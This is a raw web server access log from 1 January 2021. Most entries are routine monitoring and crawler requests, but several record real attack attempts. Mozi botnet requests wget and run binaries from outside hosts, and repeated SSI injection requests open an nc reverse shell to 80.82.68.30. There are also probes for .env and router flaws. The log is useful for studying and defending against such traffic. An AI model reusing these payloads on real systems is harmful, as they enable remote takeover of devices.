212.91.246.72 - - [01/Jan/2021:11:54:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:11:55:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:11:56:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:11:57:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
103.78.208.100 - - [01/Jan/2021:11:57:45 +0100] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
212.91.246.72 - - [01/Jan/2021:11:58:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:11:59:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
92.118.161.25 - - [01/Jan/2021:11:59:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com"
212.91.246.72 - - [01/Jan/2021:12:00:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:12:01:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
60.215.1.172 - - [01/Jan/2021:12:01:50 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://60.215.1.172:36753/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 310 "-" "Hello, world"
212.91.246.72 - - [01/Jan/2021:12:02:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:12:03:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:12:04:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:12:05:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
134.122.7.61 - - [01/Jan/2021:12:05:30 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
212.91.246.72 - - [01/Jan/2021:12:06:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:12:07:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:12:08:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
139.162.145.250 - - [01/Jan/2021:12:08:05 +0100] "GET /bag2 HTTP/1.1" 404 309 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)"
212.91.246.72 - - [01/Jan/2021:12:09:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
43.239.152.110 - - [01/Jan/2021:12:09:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [01/Jan/2021:12:10:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:12:11:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:12:12:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:12:13:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:12:14:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:12:15:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:12:16:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:12:17:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:12:18:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:12:19:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:12:20:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:12:21:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:12:22:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:12:23:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:12:24:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
109.86.168.132 - - [01/Jan/2021:12:24:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [01/Jan/2021:12:25:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:12:26:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:12:27:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:12:28:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:12:29:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:12:30:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:12:31:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
216.244.66.235 - - [01/Jan/2021:12:31:02 +0100] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)"
212.91.246.72 - - [01/Jan/2021:12:32:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
59.99.139.146 - - [01/Jan/2021:12:32:01 +0100] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://59.99.139.146:38326/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 310 "-" "-"
212.91.246.72 - - [01/Jan/2021:12:33:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:12:34:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:12:35:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:12:36:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:12:37:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:12:38:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:12:39:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:12:40:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.82.68.30 - - [01/Jan/2021:12:39:43 +0100] "POST /editBlackAndWhiteList HTTP/1.1" 404 326 "-" "ApiTool"
216.244.66.235 - - [01/Jan/2021:12:40:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)"
172.93.102.236 - - [01/Jan/2021:12:41:00 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
212.91.246.72 - - [01/Jan/2021:12:41:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
222.137.203.106 - - [01/Jan/2021:12:41:27 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 319 "-" "Hello, World"
212.91.246.72 - - [01/Jan/2021:12:42:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:12:43:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:12:44:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.82.68.30 - - [01/Jan/2021:12:44:12 +0100] "GET /incl/image_test.shtml?camnbr=%3c%21--%23exec%20cmd=%22mkfifo%20/tmp/s;nc%20-w%205%2080.82.68.30%209772%200%3C/tmp/s|/bin/sh%3E/tmp/s%202%3E/tmp/s;rm%20/tmp/s%22%20--%3e HTTP/1.0" 404 322 "-" "-"
212.91.246.72 - - [01/Jan/2021:12:45:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:12:46:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.239.147.228 - - [01/Jan/2021:12:46:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
212.91.246.72 - - [01/Jan/2021:12:47:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
172.93.102.236 - - [01/Jan/2021:12:47:34 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
172.93.102.236 - - [01/Jan/2021:12:47:39 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
172.93.102.236 - - [01/Jan/2021:12:47:40 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
172.93.102.236 - - [01/Jan/2021:12:47:43 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
212.91.246.72 - - [01/Jan/2021:12:48:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
172.93.102.236 - - [01/Jan/2021:12:48:01 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
172.93.102.236 - - [01/Jan/2021:12:48:10 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
172.93.102.236 - - [01/Jan/2021:12:48:29 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
212.91.246.72 - - [01/Jan/2021:12:49:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:12:50:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:12:51:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.82.68.30 - - [01/Jan/2021:12:51:26 +0100] "GET /incl/image_test.shtml?camnbr=%3c%21--%23exec%20cmd=%22mkfifo%20/tmp/s;nc%20-w%205%2080.82.68.30%209772%200%3C/tmp/s|/bin/sh%3E/tmp/s%202%3E/tmp/s;rm%20/tmp/s%22%20--%3e HTTP/1.0" 404 322 "-" "-"
212.91.246.72 - - [01/Jan/2021:12:52:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:12:53:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
172.105.89.161 - - [01/Jan/2021:12:53:06 +0100] "GET /0bef HTTP/1.0" 404 305 "-" "-"
212.91.246.72 - - [01/Jan/2021:12:54:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
172.105.89.161 - - [01/Jan/2021:12:54:16 +0100] "GET /0bef HTTP/1.0" 404 305 "-" "-"
209.17.96.226 - - [01/Jan/2021:12:54:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Nimbostratus-Bot/v1.3.2; http://cloudsystemnetworks.com)"
212.91.246.72 - - [01/Jan/2021:12:55:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
172.105.89.161 - - [01/Jan/2021:12:55:19 +0100] "GET /0bef HTTP/1.0" 404 305 "-" "-"
172.105.89.161 - - [01/Jan/2021:12:55:25 +0100] "GET /0bef HTTP/1.0" 404 305 "-" "-"
172.105.89.161 - - [01/Jan/2021:12:55:35 +0100] "GET /0bef HTTP/1.0" 404 305 "-" "-"
212.91.246.72 - - [01/Jan/2021:12:56:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:12:57:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
172.105.89.161 - - [01/Jan/2021:12:57:07 +0100] "GET /0bef HTTP/1.0" 404 305 "-" "-"
172.105.89.161 - - [01/Jan/2021:12:57:36 +0100] "GET /0bef HTTP/1.0" 404 305 "-" "-"
212.91.246.72 - - [01/Jan/2021:12:58:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
172.105.89.161 - - [01/Jan/2021:12:58:13 +0100] "GET /0bef HTTP/1.0" 404 305 "-" "-"
172.105.89.161 - - [01/Jan/2021:12:58:23 +0100] "GET /0bef HTTP/1.0" 404 305 "-" "-"
80.82.68.30 - - [01/Jan/2021:12:58:47 +0100] "GET /incl/image_test.shtml?camnbr=%3c%21--%23exec%20cmd=%22mkfifo%20/tmp/s;nc%20-w%205%2080.82.68.30%209772%200%3C/tmp/s|/bin/sh%3E/tmp/s%202%3E/tmp/s;rm%20/tmp/s%22%20--%3e HTTP/1.0" 404 322 "-" "-"
212.91.246.72 - - [01/Jan/2021:12:59:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
172.105.89.161 - - [01/Jan/2021:12:59:47 +0100] "GET /0bef HTTP/1.0" 404 305 "-" "-"
212.91.246.72 - - [01/Jan/2021:13:00:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.246.165.170 - - [01/Jan/2021:13:00:37 +0100] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:59.0) Gecko/20100101 Firefox/59.0"
64.246.165.170 - - [01/Jan/2021:13:00:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:59.0) Gecko/20100101 Firefox/59.0"
212.91.246.72 - - [01/Jan/2021:13:01:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.82.68.30 - - [01/Jan/2021:13:01:39 +0100] "GET /incl/image_test.shtml?camnbr=%3c%21--%23exec%20cmd=%22mkfifo%20/tmp/s;nc%20-w%205%2080.82.68.30%209772%200%3C/tmp/s|/bin/sh%3E/tmp/s%202%3E/tmp/s;rm%20/tmp/s%22%20--%3e HTTP/1.0" 404 322 "-" "-"
212.91.246.72 - - [01/Jan/2021:13:02:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.157.56.139 - - [01/Jan/2021:13:02:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
212.91.246.72 - - [01/Jan/2021:13:03:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.82.68.30 - - [01/Jan/2021:13:03:49 +0100] "GET /incl/image_test.shtml?camnbr=%3c%21--%23exec%20cmd=%22mkfifo%20/tmp/p;nc%20-w%205%2080.82.68.30%209772%200%3C/tmp/p|/bin/sh%3E/tmp/p%202%3E/tmp/p;rm%20/tmp/p%22%20--%3e HTTP/1.0" 404 322 "-" "-"
172.93.102.236 - - [01/Jan/2021:13:03:54 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
212.91.246.72 - - [01/Jan/2021:13:04:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
172.93.102.236 - - [01/Jan/2021:13:04:05 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
212.91.246.72 - - [01/Jan/2021:13:05:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:13:06:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:13:07:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:13:08:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:13:09:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:13:10:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:13:11:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
74.120.14.56 - - [01/Jan/2021:13:11:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
74.120.14.56 - - [01/Jan/2021:13:11:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [01/Jan/2021:13:12:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:13:13:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:13:14:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.239.147.228 - - [01/Jan/2021:13:14:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
52.161.97.190 - - [01/Jan/2021:13:14:39 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
52.161.97.190 - - [01/Jan/2021:13:14:40 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [01/Jan/2021:13:15:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
139.162.145.250 - - [01/Jan/2021:13:15:34 +0100] "GET /bag2 HTTP/1.1" 404 309 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)"
212.91.246.72 - - [01/Jan/2021:13:16:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:13:17:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:13:18:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:13:19:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:13:20:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:13:21:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:13:22:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:13:23:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:13:24:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:13:25:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:13:26:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
92.118.160.13 - - [01/Jan/2021:13:26:03 +0100] "GET / HTTP/1.0" 200 1229 "-" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com"
212.91.246.72 - - [01/Jan/2021:13:27:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:13:28:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
178.163.41.59 - - [01/Jan/2021:13:28:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
212.91.246.72 - - [01/Jan/2021:13:29:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:13:30:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
88.135.195.83 - - [01/Jan/2021:13:30:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [01/Jan/2021:13:31:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:13:32:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
202.162.199.22 - - [01/Jan/2021:13:32:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [01/Jan/2021:13:33:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:13:34:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.172.230.53 - - [01/Jan/2021:13:34:09 +0100] "GET /login HTTP/1.0" 404 306 "-" "-"
35.172.230.53 - - [01/Jan/2021:13:34:09 +0100] "GET /manager/html HTTP/1.0" 404 313 "-" "-"
212.91.246.72 - - [01/Jan/2021:13:35:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:13:36:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:13:37:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.103.246.109 - - [01/Jan/2021:13:37:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
